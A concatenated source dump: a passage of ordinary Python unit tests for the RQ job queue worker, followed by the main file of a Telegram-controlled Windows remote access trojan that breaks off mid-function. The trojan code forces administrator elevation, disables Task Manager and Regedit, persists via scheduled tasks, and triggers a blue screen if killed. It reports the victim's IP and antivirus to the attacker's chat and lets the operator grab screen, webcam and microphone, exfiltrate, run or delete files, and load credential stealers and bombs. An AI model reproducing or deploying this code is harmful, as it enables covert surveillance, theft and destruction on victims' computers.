"""Check that log_job_description False causes job lifespan to not be logged."""
q = Queue()
w = Worker([q], log_job_description=False)
q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.dequeue_job_and_maintain_ttl(10)
self.assertNotIn("Frank", mock_logger_info.call_args[0][2])
def test_worker_version(self):
q = Queue()
w = Worker([q])
w.version = '0.0.0'
w.register_birth()
self.assertEqual(w.version, '0.0.0')
w.refresh()
self.assertEqual(w.version, '0.0.0')
# making sure that version is preserved when worker is retrieved by key
worker = Worker.find_by_key(w.key)
self.assertEqual(worker.version, '0.0.0')
def test_python_version(self):
python_version = sys.version
q = Queue()
w = Worker([q])
w.register_birth()
self.assertEqual(w.python_version, python_version)
# now patching version
python_version = 'X.Y.Z.final' # dummy version
self.assertNotEqual(python_version, sys.version) # otherwise tests are pointless
w2 = Worker([q])
w2.python_version = python_version
w2.register_birth()
self.assertEqual(w2.python_version, python_version)
# making sure that version is preserved when worker is retrieved by key
worker = Worker.find_by_key(w2.key)
self.assertEqual(worker.python_version, python_version)
def wait_and_kill_work_horse(pid, time_to_wait=0.0):
time.sleep(time_to_wait)
os.kill(pid, signal.SIGKILL)
class TimeoutTestCase:
def setUp(self):
# we want tests to fail if signal are ignored and the work remain
# running, so set a signal to kill them after X seconds
self.killtimeout = 15
signal.signal(signal.SIGALRM, self._timeout)
signal.alarm(self.killtimeout)
def _timeout(self, signal, frame):
raise AssertionError(
"test still running after %i seconds, likely the worker wasn't shutdown correctly" % self.killtimeout
)
class WorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
@slow
def test_idle_worker_warm_shutdown(self):
"""worker with no ongoing job receiving single SIGTERM signal and shutting down"""
w = Worker('foo')
self.assertFalse(w._stop_requested)
p = Process(target=kill_worker, args=(os.getpid(), False))
p.start()
w.work()
p.join(1)
self.assertFalse(w._stop_requested)
@slow
def test_working_worker_warm_shutdown(self):
"""worker with an ongoing job receiving single SIGTERM signal, allowing job to finish then shutting down"""
fooq = Queue('foo')
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_warm'
fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
self.assertFalse(w._stop_requested)
p = Process(target=kill_worker, args=(os.getpid(), False))
p.start()
w.work()
p.join(2)
self.assertFalse(p.is_alive())
self.assertTrue(w._stop_requested)
self.assertTrue(os.path.exists(sentinel_file))
self.assertIsNotNone(w.shutdown_requested_date)
self.assertEqual(type(w.shutdown_requested_date).__name__, 'datetime')
@slow
def test_working_worker_cold_shutdown(self):
"""Busy worker shuts down immediately on double SIGTERM signal"""
fooq = Queue('foo')
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_cold'
fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
self.assertFalse(w._stop_requested)
p = Process(target=kill_worker, args=(os.getpid(), True))
p.start()
self.assertRaises(SystemExit, w.work)
p.join(1)
self.assertTrue(w._stop_requested)
self.assertFalse(os.path.exists(sentinel_file))
shutdown_requested_date = w.shutdown_requested_date
self.assertIsNotNone(shutdown_requested_date)
self.assertEqual(type(shutdown_requested_date).__name__, 'datetime')
@slow
def test_work_horse_death_sets_job_failed(self):
"""worker with an ongoing job whose work horse dies unexpectadly (before
completing the job) should set the job's status to FAILED
"""
fooq = Queue('foo')
self.assertEqual(fooq.count, 0)
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
if os.path.exists(sentinel_file):
os.remove(sentinel_file)
fooq.enqueue(create_file_after_timeout, sentinel_file, 100)
job, queue = w.dequeue_job_and_maintain_ttl(5)
w.fork_work_horse(job, queue)
p = Process(target=wait_and_kill_work_horse, args=(w._horse_pid, 0.5))
p.start()
w.monitor_work_horse(job, queue)
job_status = job.get_status()
p.join(1)
self.assertEqual(job_status, JobStatus.FAILED)
failed_job_registry = FailedJobRegistry(queue=fooq)
self.assertTrue(job in failed_job_registry)
self.assertEqual(fooq.count, 0)
@slow
def test_work_horse_force_death(self):
"""Simulate a frozen worker that doesn't observe the timeout properly.
Fake it by artificially setting the timeout of the parent process to
something much smaller after the process is already forked.
"""
fooq = Queue('foo')
self.assertEqual(fooq.count, 0)
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
if os.path.exists(sentinel_file):
os.remove(sentinel_file)
fooq.enqueue(launch_process_within_worker_and_store_pid, sentinel_file, 100)
job, queue = w.dequeue_job_and_maintain_ttl(5)
w.fork_work_horse(job, queue)
job.timeout = 5
w.job_monitoring_interval = 1
now = utcnow()
time.sleep(1)
with open(sentinel_file) as f:
subprocess_pid = int(f.read().strip())
self.assertTrue(psutil.pid_exists(subprocess_pid))
w.monitor_work_horse(job, queue)
fudge_factor = 1
total_time = w.job_monitoring_interval + 65 + fudge_factor
self.assertTrue((utcnow() - now).total_seconds() < total_time)
self.assertEqual(job.get_status(), JobStatus.FAILED)
failed_job_registry = FailedJobRegistry(queue=fooq)
self.assertTrue(job in failed_job_registry)
self.assertEqual(fooq.count, 0)
self.assertFalse(psutil.pid_exists(subprocess_pid))
def schedule_access_self():
q = Queue('default', connection=get_current_connection())
q.enqueue(access_self)
@pytest.mark.skipif(sys.platform == 'darwin', reason='Fails on OS X')
class TestWorkerSubprocess(RQTestCase):
def setUp(self):
super(TestWorkerSubprocess, self).setUp()
db_num = self.testconn.connection_pool.connection_kwargs['db']
self.redis_url = 'redis://127.0.0.1:6379/%d' % db_num
def test_run_empty_queue(self):
"""Run the worker in its own process with an empty queue"""
subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
def test_run_access_self(self):
"""Schedule a job, then run the worker as subprocess"""
q = Queue()
job = q.enqueue(access_self)
subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
registry = FinishedJobRegistry(queue=q)
self.assertTrue(job in registry)
assert q.count == 0
@skipIf('pypy' in sys.version.lower(), 'often times out with pypy')
def test_run_scheduled_access_self(self):
"""Schedule a job that schedules a job, then run the worker as subprocess"""
q = Queue()
job = q.enqueue(schedule_access_self)
subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
registry = FinishedJobRegistry(queue=q)
self.assertTrue(job in registry)
assert q.count == 0
@pytest.mark.skipif(sys.platform == 'darwin', reason='requires Linux signals')
@skipIf('pypy' in sys.version.lower(), 'these tests often fail on pypy')
class HerokuWorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
def setUp(self):
super(HerokuWorkerShutdownTestCase, self).setUp()
self.sandbox = '/tmp/rq_shutdown/'
os.makedirs(self.sandbox)
def tearDown(self):
shutil.rmtree(self.sandbox, ignore_errors=True)
@slow
def test_immediate_shutdown(self):
"""Heroku work horse shutdown with immediate (0 second) kill"""
p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 0))
p.start()
time.sleep(0.5)
os.kill(p.pid, signal.SIGUSR1)
p.join(2)
self.assertEqual(p.exitcode, 1)
self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
@slow
def test_1_sec_shutdown(self):
"""Heroku work horse shutdown with 1 second kill"""
p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 1))
p.start()
time.sleep(0.5)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
self.assertEqual(p.exitcode, None)
p.join(2)
self.assertEqual(p.exitcode, 1)
self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
@slow
def test_shutdown_double_sigrtmin(self):
"""Heroku work horse shutdown with long delay but SIGUSR1 sent twice"""
p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 10))
p.start()
time.sleep(0.5)
os.kill(p.pid, signal.SIGUSR1)
# we have to wait a short while otherwise the second signal wont bet processed.
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
p.join(2)
self.assertEqual(p.exitcode, 1)
self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
@mock.patch('rq.worker.logger.info')
def test_handle_shutdown_request(self, mock_logger_info):
"""Mutate HerokuWorker so _horse_pid refers to an artificial process
and test handle_warm_shutdown_request"""
w = HerokuWorker('foo')
path = os.path.join(self.sandbox, 'shouldnt_exist')
p = Process(target=create_file_after_timeout_and_setsid, args=(path, 2))
p.start()
self.assertEqual(p.exitcode, None)
time.sleep(0.1)
w._horse_pid = p.pid
w.handle_warm_shutdown_request()
p.join(2)
# would expect p.exitcode to be -34
self.assertEqual(p.exitcode, -34)
self.assertFalse(os.path.exists(path))
mock_logger_info.assert_called_with('Killed horse pid %s', p.pid)
def test_handle_shutdown_request_no_horse(self):
"""Mutate HerokuWorker so _horse_pid refers to non existent process
and test handle_warm_shutdown_request"""
w = HerokuWorker('foo')
w._horse_pid = 19999
w.handle_warm_shutdown_request()
class TestExceptionHandlerMessageEncoding(RQTestCase):
def setUp(self):
super(TestExceptionHandlerMessageEncoding, self).setUp()
self.worker = Worker("foo")
self.worker._exc_handlers = []
# Mimic how exception info is actually passed forwards
try:
raise Exception(u"💪")
except Exception:
self.exc_info = sys.exc_info()
def test_handle_exception_handles_non_ascii_in_exception_message(self):
"""worker.handle_exception doesn't crash on non-ascii in exception message."""
self.worker.handle_exception(Mock(), *self.exc_info)
|
API.py | from RAT import *
from Core.Settings.Organization import *
from Core.Settings.Antivirus import *
from Core.Settings.Admin import *
from Core.Settings.CriticalProcess import *
from Core.Settings.MessageBox import *
from Core.Network.Information import *
from Core.Network.Location import *
from Core.Main.Screen import *
from Core.Main.Webcam import *
from Core.Main.Audio import *
from Core.Main.Power import *
from Core.Main.Autorun import *
from Core.Files.Tasklist import *
from Core.Files.Taskkill import *
from Core.Fun.Message import *
from Core.Fun.Speak import *
from Core.Fun.OpenURL import *
from Core.Fun.Wallpapers import *
from Core.Bomb.ZipBomb import *
from Core.Bomb.ForkBomb import *
from Core.Stealer.Wifi import *
from Core.Stealer.FileZilla import *
from Core.Stealer.Discord import *
from Core.Stealer.Chromium import *
from Core.Stealer.Telegram import *
from Core.Other.Clipboard import *
#from Core.Other.Keylogger import *
from Core.Other.SendKeys import *
from Core.Other.Monitor import *
from Core.Other.Volume import *
from Core.Other.Rotate import *
from Core.Other.Freeze import *
from Core.Other.DVD import *
import telebot
bot = telebot.TeleBot(TelegramToken, threaded=True)
bot.worker_pool = telebot.util.ThreadPool(num_threads=50)
menu = telebot.types.ReplyKeyboardMarkup()
button1 = telebot.types.KeyboardButton('/1\n<<')
button2 = telebot.types.KeyboardButton('/2\n>>')
button3 = telebot.types.KeyboardButton('/Screen\n🖼')
button4 = telebot.types.KeyboardButton('/Webcam\n📸')
button5 = telebot.types.KeyboardButton('/Audio\n🎙')
button6 = telebot.types.KeyboardButton('/Power\n🔴')
button7 = telebot.types.KeyboardButton('/Autorun\n🔵')
menu.row(button1, button3, button2)
menu.row(button4, button5)
menu.row(button6, button7)
main2 = telebot.types.InlineKeyboardMarkup()
button1 = telebot.types.InlineKeyboardButton('Hibernate - 🛑', callback_data='hibernate')
button2 = telebot.types.InlineKeyboardButton('Shutdown - ⛔️', callback_data='shutdown')
button3 = telebot.types.InlineKeyboardButton('Restart - ⭕️', callback_data='restart')
button4 = telebot.types.InlineKeyboardButton('Logoff - 💢', callback_data='logoff')
button5 = telebot.types.InlineKeyboardButton('BSoD - 🌀', callback_data='bsod')
button6 = telebot.types.InlineKeyboardButton('« Back', callback_data='cancel')
main2.row(button1)
main2.row(button2)
main2.row(button3)
main2.row(button4)
main2.row(button5)
main2.row(button6)
main3 = telebot.types.InlineKeyboardMarkup()
button1 = telebot.types.InlineKeyboardButton('Add to Startup - 📥', callback_data='startup')
button2 = telebot.types.InlineKeyboardButton('Uninstall - ♻️', callback_data='confirm')
button3 = telebot.types.InlineKeyboardButton('« Back', callback_data='cancel')
main3.row(button1)
main3.row(button2)
main3.row(button3)
main4 = telebot.types.InlineKeyboardMarkup()
button1 = telebot.types.InlineKeyboardButton('Yes, im sure!', callback_data='uninstall')
button2 = telebot.types.InlineKeyboardButton('Hell no!', callback_data='cancel')
button3 = telebot.types.InlineKeyboardButton('« Back', callback_data='cancel')
main4.row(button1)
main4.row(button2)
main4.row(button3)
main5 = telebot.types.ReplyKeyboardMarkup()
button1 = telebot.types.KeyboardButton('/3\n<<')
button2 = telebot.types.KeyboardButton('/4\n>>')
button3 = telebot.types.KeyboardButton('/Screen\n🖼')
button4 = telebot.types.KeyboardButton('/Files\n💾')
button5 = telebot.types.KeyboardButton('/Tasklist\n📋')
button6 = telebot.types.KeyboardButton('/Taskkill\n📝')
main5.row(button1, button3, button2)
main5.row(button4)
main5.row(button5, button6)
main6 = telebot.types.InlineKeyboardMarkup()
button1 = telebot.types.InlineKeyboardButton('Kill all Processes', callback_data='taskkill all')
button2 = telebot.types.InlineKeyboardButton('Disable Task Manager', callback_data='disabletaskmgr')
main6.row(button1)
main6.row(button2)
main7 = telebot.types.ReplyKeyboardMarkup()
button1 = telebot.types.KeyboardButton('/CD\n🗂')
button2 = telebot.types.KeyboardButton('/Upload\n📡')
button3 = telebot.types.KeyboardButton('/ls\n📄')
button4 = telebot.types.KeyboardButton('/Remove\n🗑')
button5 = telebot.types.KeyboardButton('/Download\n📨')
button6 = telebot.types.KeyboardButton('/Run\n📌')
button7 = telebot.types.KeyboardButton('/Cancel')
main7.row(button1, button2, button3)
main7.row(button4, button5, button6)
main7.row(button7)
main8 = telebot.types.ReplyKeyboardMarkup()
button1 = telebot.types.KeyboardButton('/5\n<<')
button2 = telebot.types.KeyboardButton('/6\n>>')
button3 = telebot.types.KeyboardButton('/Screen\n🖼')
button4 = telebot.types.KeyboardButton('/Message\n💬')
button5 = telebot.types.KeyboardButton('/Speak\n📢')
button6 = telebot.types.KeyboardButton('/OpenURL\n🌐')
button7 = telebot.types.KeyboardButton('/Wallpapers\n🧩')
main8.row(button1, button3, button2)
main8.row(button4, button5)
main8.row(button6, button7)
# Create a folder to save temporary files
CurrentName = os.path.basename(sys.argv[0])
CurrentPath = sys.argv[0]
RAT = [
Directory,
Directory + 'Documents',
Directory + 'Photos'
]
for Directories in RAT:
if not os.path.exists(Directories):
os.makedirs(Directories)
# Run as Administrator
if AdminRightsRequired is True:
if Admin() is False:
while True:
try:
print('[~] › Trying elevate previleges to administrator\n')
os.startfile(CurrentPath, 'runas')
except:
pass
else:
print('[+] › ' + CurrentName + ' opened as admin rights\n')
sys.exit()
# Disables TaskManager
if DisableTaskManager is True:
if os.path.exists(Directory + 'RegeditDisableTaskManager'):
print('[+] › taskmgr.exe is already disabled\n')
else:
if Admin() is False:
print('[-] › This function requires admin rights\n')
if Admin() is True:
RegeditDisableTaskManager()
open(Directory + 'RegeditDisableTaskManager', 'a').close()
print('[+] › taskmgr.exe has been disabled\n')
# Disables Regedit
if DisableRegistryTools is True:
if os.path.exists(Directory + 'RegeditDisableRegistryTools'):
print('[+] › regedit.exe is already disabled\n')
else:
if Admin() is False:
print('[-] › This function requires admin rights\n')
if Admin() is True:
RegeditDisableRegistryTools()
open(Directory + 'RegeditDisableRegistryTools', 'a').close()
print('[+] › regedit.exe has been disabled\n')
# Adds a program to startup
if AutorunEnabled is True:
if SchtasksExists(AutorunName) and InstallPathExists(InstallPath, ProcessName) is True:
print('[+] › ' + CurrentName + ' ‹ is already in startup › ' + InstallPath + ProcessName + '\n')
else:
if Admin() is False:
print('[-] › This function requires admin rights\n')
if Admin() is True:
AddToAutorun(AutorunName, InstallPath, ProcessName)
if not os.path.exists(InstallPath + ProcessName):
try:
CopyToAutorun(CurrentPath, InstallPath, ProcessName)
except:
pass
print('[+] › ' + CurrentName + ' ‹ has been copied to startup › ' + InstallPath + ProcessName + '\n')
# Displays a message on the screen.
if DisplayMessageBox is True:
if not os.path.exists(Directory + 'DisplayMessageBox'):
open(Directory + 'DisplayMessageBox', 'a').close()
MessageBox(Message)
# Protect process with BSoD (if killed).
if ProcessBSODProtectionEnabled is True:
if Admin() is False:
print('[-] › This function requires admin rights\n')
if Admin() is True:
if platform.release() == '10':
Thread(target=ProcessChecker).start()
if platform.release() != '10':
SetProtection()
print('[+] › Process protection has been activated\n')
# Sends an online message
while True:
try:
if Admin() is True:
Online = '🔘 Online!'
if Admin() is False:
Online = '🟢 Online!'
bot.send_message(TelegramChatID,
'\n*' + Online + '\n'
'\nPC » ' + os.getlogin() +
'\nOS » ' + Windows() +
'\n'
'\nAV » ' + Antivirus[0] +
'\n'
'\nIP » ' + Geolocation('query') + '*',
parse_mode='Markdown')
except Exception as e:
print('[-] › Retrying connect to api.telegram.org\n')
print(e)
else:
print('[+] › Connected to api.telegram.org\n')
break
# Takes a screenshot
@bot.message_handler(regexp='/Screen')
def Screen(command):
try:
bot.send_chat_action(command.chat.id, 'upload_photo')
File = Directory + 'Screenshot.jpg'
Screenshot(File)
Screen = open(File, 'rb')
bot.send_photo(command.chat.id, Screen)
except:
pass
# Takes a photo from a webcam
@bot.message_handler(regexp='/Webcam')
def Webcam(command):
try:
bot.send_chat_action(command.chat.id, 'upload_photo')
File = Directory + 'Webcam.jpg'
if os.path.exists(File):
os.remove(File)
WebcamScreenshot(File)
Webcam = open(File, 'rb')
bot.send_photo(command.chat.id, Webcam)
except:
bot.reply_to(command, '_Webcam not found._', parse_mode='Markdown')
# Records microphone sound
@bot.message_handler(regexp='/Audio')
def Audio(command):
try:
Seconds = re.split('/Audio ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Recording..._', parse_mode='Markdown')
try:
File = Directory + 'Audio.wav'
Microphone(File, Seconds)
Audio = open(File, 'rb')
bot.send_voice(command.chat.id, Audio)
except ValueError:
bot.reply_to(command, '_Specify the recording time in seconds._', parse_mode='Markdown')
except:
bot.reply_to(command, '_Microphone not found._', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Specify the recording duration_\n\n*› /Audio*', parse_mode='Markdown')
# Sends a message
def SendMessage(call, text):
try:
bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=text, parse_mode='Markdown')
except:
pass
# Power and startup management
@bot.callback_query_handler(func=lambda call: True)
def CallbackInline(command):
if command.message:
# Hibernate button
if command.data == 'hibernate':
SendMessage(command, '_Hibernate command received!_')
UnsetProtection()
Hibernate()
# Shutdown button
if command.data == 'shutdown':
SendMessage(command, '*Shutdown* command received!')
UnsetProtection()
Shutdown()
# Reboot button
if command.data == 'restart':
SendMessage(command, '*Restart* command received!')
UnsetProtection()
Restart()
# Button that ends a user session
if command.data == 'logoff':
SendMessage(command, '*Logoff* command received!')
UnsetProtection()
Logoff()
# Button killing system with blue screen of death
if command.data == 'bsod':
SendMessage(command, 'The *Blue Screen of Death* has been activated!')
UnsetProtection()
BSoD()
# Button processing which adds a trojan to startup (schtasks)
if command.data == 'startup':
if SchtasksExists(AutorunName) and InstallPathExists(InstallPath, ProcessName) is True:
SendMessage(command, '*' + ProcessName + '* is already in startup.')
else:
if Admin() is False:
SendMessage(command, '_This function requires admin rights._')
if Admin() is True:
AddToAutorun(AutorunName, InstallPath, ProcessName)
if not os.path.exists(InstallPath + ProcessName):
try:
CopyToAutorun(CurrentPath, InstallPath, ProcessName)
except:
pass
SendMessage(command, '*' + ProcessName + '* has been copied to startup!')
# Button processing that confirms the removal of a trojan
if command.data == 'confirm':
bot.edit_message_text(chat_id=command.message.chat.id,
message_id=command.message.message_id, text='_Are you sure?_', reply_markup=main4, parse_mode='Markdown')
# Handling the <<Uninstall>> Button
if command.data == 'uninstall':
SendMessage(command, '*' + CurrentName + '* has been uninstalled!')
Uninstall(AutorunName, InstallPath, ProcessName, CurrentName, CurrentPath, Directory)
# Handling the <<Kill All Processes>> Button
if command.data == 'taskkill all':
SendMessage(command, '_Terminating processes..._')
TaskkillAll(CurrentName)
SendMessage(command, '_All processes has been terminated!_')
# Handling the <<Disable Task Manager>> Button
if command.data == 'disabletaskmgr':
if os.path.exists(Directory + 'RegeditDisableTaskManager'):
SendMessage(command, '*taskmgr.exe* is already disabled.')
else:
if Admin() is False:
SendMessage(command, '_This function requires admin rights._')
if Admin() is True:
RegeditDisableTaskManager()
open(Directory + 'RegeditDisableTaskManager', 'a').close()
SendMessage(command, '*taskmgr.exe* has been disabled!')
# Handling the <<Back>> Button
if command.data == 'cancel':
SendMessage(command, '`...`')
# Browse and switch directories
@bot.message_handler(regexp='/CD')
def CD(command):
try:
Path = re.split('/CD ', command.text, flags=re.I)[1]
os.chdir(Path)
bot.send_message(command.chat.id, '_Directory Changed!_\n\n`' + os.getcwd() + '`', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_Directory not found._', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Current Directory_\n\n`' + os.getcwd() + '`\n\n_Username_\n\n`' + os.getlogin() + '`', parse_mode='Markdown')
# List of files from a directory
@bot.message_handler(regexp='/ls')
def ls(command):
try:
Dirs = '\n``'.join(os.listdir())
bot.send_message(command.chat.id, '`' + os.getcwd() + '`\n\n' + '`' + Dirs + '`', parse_mode='Markdown')
except:
try:
Dirse = '\n'.join(os.listdir())
SplittedText = telebot.util.split_string(Dirse, 4096)
for Dirse in SplittedText:
bot.send_message(command.chat.id, '`' + Dirse + '`', parse_mode='Markdown')
except PermissionError:
bot.reply_to(command, '_Permission denied._', parse_mode='Markdown')
# Deletes a user selected file
@bot.message_handler(commands=['Remove', 'remove'])
def Remove(command):
try:
File = re.split('/Remove ', command.text, flags=re.I)[1]
Created = os.path.getctime(os.getcwd() + '\\' + File)
Year, Month, Day, Hour, Minute, Second=time.localtime(Created)[:-3]
def ConvertBytes(num):
for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:
if num < 1024.0:
return '%3.1f %s' % (num, x)
num /= 1024.0
def FileSize(FilePath):
if os.path.isfile(FilePath):
FileInfo = os.stat(FilePath)
return ConvertBytes(FileInfo.st_size)
bot.send_message(command.chat.id,
'File *' + File + '* removed!'
'\n'
'\n*Created* » `%02d/%02d/%d'%(Day, Month, Year) + '`' +
'\n*Size* » `' + FileSize(os.getcwd() + '\\' + File) + '`',
parse_mode='Markdown')
os.remove(os.getcwd() + '\\' + File)
except:
try:
File = re.split('/Remove ', command.text, flags=re.I)[1]
Created = os.path.getctime(os.getcwd() + '\\' + File)
Year, Month, Day, Hour, Minute, Second=time.localtime(Created)[:-3]
Folder = os.getcwd() + '\\' + File
FolderSize = 0
for (Path, Dirs, Files) in os.walk(Folder):
for iFile in Files:
FileName = os.path.join(Path, iFile)
FolderSize += os.path.getsize(FileName)
Files = Folders = 0
for _, DirNames, FileNames in os.walk(os.getcwd() + '\\' + File):
Files += len(FileNames)
Folders += len(DirNames)
shutil.rmtree(os.getcwd() + '\\' + File)
bot.send_message(command.chat.id,
'Folder *' + File + '* removed!'
'\n'
'\n*Created* » `%02d/%02d/%d'%(Day, Month, Year) + '`' +
'\n*Size* » `%0.1f MB' % (FolderSize/(1024*1024.0)) + '`' +
'\n*Contained* » `' + '{:,} Files, {:,} Folders'.format(Files, Folders) + '`',
parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File not found._', parse_mode='Markdown')
except PermissionError:
bot.reply_to(command, '_Permission denied._', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Remove • /RemoveAll*', parse_mode='Markdown')
# Deletes all files from the directory
@bot.message_handler(commands=['RemoveAll', 'removeall'])
def RemoveAll(command):
try:
bot.send_message(command.chat.id, '_Removing files..._', parse_mode='Markdown')
FolderSize = 0
for (Path, Dirs, Files) in os.walk(os.getcwd()):
for File in Files:
FileNames = os.path.join(Path, File)
FolderSize += os.path.getsize(FileNames)
Files = Folders = 0
for _, DirNames, FileNames in os.walk(os.getcwd()):
Files += len(FileNames)
Folders += len(DirNames)
list = os.listdir(os.getcwd())
a = len(list)
for FileNames in os.listdir(os.getcwd()):
FilePath = os.path.join(os.getcwd(), FileNames)
try:
if os.path.isfile(FilePath) or os.path.islink(FilePath):
os.unlink(FilePath)
elif os.path.isdir(FilePath):
shutil.rmtree(FilePath)
except:
pass
list = os.listdir(os.getcwd())
b = len(list)
c = (a - b)
bot.reply_to(command,
'Removed *' + str(c) + '* files out of *' + str(a) + '!*'
'\n'
'\nSize » `%0.1f MB' % (FolderSize/(1024*1024.0)) + '`' +
'\nContained » `' + '{:,} Files, {:,} Folders'.format(Files, Folders) + '`',
parse_mode='Markdown')
except:
pass
# Upload a file to a connected computer (URL)
@bot.message_handler(regexp='/Upload')
def Upload(command):
try:
URL = re.split('/Upload ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Uploading file..._', parse_mode='Markdown')
Filename = os.getcwd() + '\\' + os.path.basename(URL)
r = urllib.request.urlretrieve(URL, Filename)
bot.reply_to(command, '_File uploaded to computer!_\n\n`' + Filename + '`', parse_mode='Markdown')
except ValueError:
bot.reply_to(command, '_Insert a direct download link._', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Send file or paste URL_\n\n*› /Upload*', parse_mode='Markdown')
# Download a file to a connected computer (Message)
@bot.message_handler(content_types=['document'])
def Document(command):
try:
File = bot.get_file(command.document.file_id)
bot.send_message(command.chat.id, '_Uploading file..._', parse_mode='Markdown')
DownloadedFile = bot.download_file(File.file_path)
Source = Directory + File.file_path;
with open(Source, 'wb') as NewFile:
NewFile.write(DownloadedFile)
Final = os.getcwd() + '\\' + Source.split(File.file_path)[1] + command.document.file_name
shutil.move(Source, Final)
bot.reply_to(command, '_File uploaded to computer!_\n\n`' + Final + '`', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File format is not supported._', parse_mode='Markdown')
except OSError:
bot.reply_to(command, '_Try saving the file in a different directory._', parse_mode='Markdown')
except:
bot.reply_to(command, '_You cannot upload a file larger than 20 MB._', parse_mode='Markdown')
# Download the file selected by the user
@bot.message_handler(regexp='/Download')
def Download(command):
try:
File = re.split('/Download ', command.text, flags=re.I)[1]
Download = open(os.getcwd() + '\\' + File, 'rb')
bot.send_message(command.chat.id, '_Sending file..._', parse_mode='Markdown')
bot.send_document(command.chat.id, Download)
except FileNotFoundError:
bot.reply_to(command, '_File not found._', parse_mode='Markdown')
except:
try:
File = re.split('/Download ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Archiving..._', parse_mode='Markdown')
shutil.make_archive(Directory + File,
'zip',
os.getcwd() + '\\',
File)
iFile = open(Directory + File + '.zip', 'rb')
bot.send_message(command.chat.id, '_Sending folder..._', parse_mode='Markdown')
bot.send_document(command.chat.id, iFile)
iFile.close()
os.remove(Directory + File + '.zip')
except PermissionError:
bot.reply_to(command, '_Permission denied._', parse_mode='Markdown')
except:
try:
iFile.close()
os.remove(Directory + File + '.zip')
bot.reply_to(command, '_You cannot download a file larger than 50 MB._', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Download*', parse_mode='Markdown')
# Runs the file selected by the user
@bot.message_handler(commands=['Run', 'run'])
def Run(command):
try:
File = re.split('/Run ', command.text, flags=re.I)[1]
os.startfile(os.getcwd() + '\\' + File)
bot.reply_to(command, 'File *' + File + '* has been running!', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File not found._', parse_mode='Markdown')
except OSError:
bot.reply_to(command, '_File isolated by the system and cannot be running._', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Run • /RunAS*', parse_mode='Markdown')
# Runs the file selected by the user as administrator
@bot.message_handler(commands=['RunAS', 'runas'])
def RunAS(command):
try:
File = re.split('/RunAS ', command.text, flags=re.I)[1]
os.startfile(os.getcwd() + '\\' + File, 'runas')
bot.reply_to(command, 'File *' + File + '* has been running!', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File not found._', parse_mode='Markdown')
except OSError:
bot.reply_to(command, '_Acces denied._', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Run • /RunAS*', parse_mode='Markdown')
# Gets a list of active processes
@bot.message_handler(regexp='/Tasklist')
def Tasklist(command):
bot.send_message(command.chat.id, '`' + ProcessList() + '`', parse_mode='Markdown')
# Kills the user selected process
@bot.message_handler(regexp='/Taskkill')
def Taskkill(command):
try:
Process = re.split('/Taskkill ', command.text, flags=re.I)[1]
KillProcess(Process)
if not Process.endswith('.exe'):
Process = Process + '.exe'
bot.reply_to(command, 'The process *' + Process + '* has been stopped!', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Enter process name_'
'\n'
'\n*› /Taskkill*'
'\n'
'\n_Active Window_'
'\n'
'\n`' + WindowTitle() + '`',
reply_markup=main6, parse_mode='Markdown')
# Displays text sent by user
@bot.message_handler(regexp='/Message')
def Message(command):
try:
Message = re.split('/Message ', command.text, flags=re.I)[1]
bot.reply_to(command, '_The message has been sended!_', parse_mode='Markdown')
SendMessageBox(Message)
except:
bot.send_message(command.chat.id, '_Enter your message_\n\n*› /Message*', parse_mode='Markdown')
# Speak text
@bot.message_handler(regexp='/Speak')
def Speak(command):
try:
Text = re.split('/Speak ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Speaking..._', parse_mode='Markdown')
try:
SpeakText(Text)
bot.reply_to(command, '_Successfully!_', parse_mode='Markdown')
except:
bot.reply_to(command, '_Failed to speak text._', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your text_\n\n*› /Speak*', parse_mode='Markdown')
# Opens a link from a standard browser
@bot.message_handler(regexp='/OpenURL')
def OpenURL(command):
try:
URL = re.split('/OpenURL ', command.text, flags=re.I)[1]
OpenBrowser(URL)
bot.reply_to(command, '_The URL has been opened!_', parse_mode='Markdown')
except:
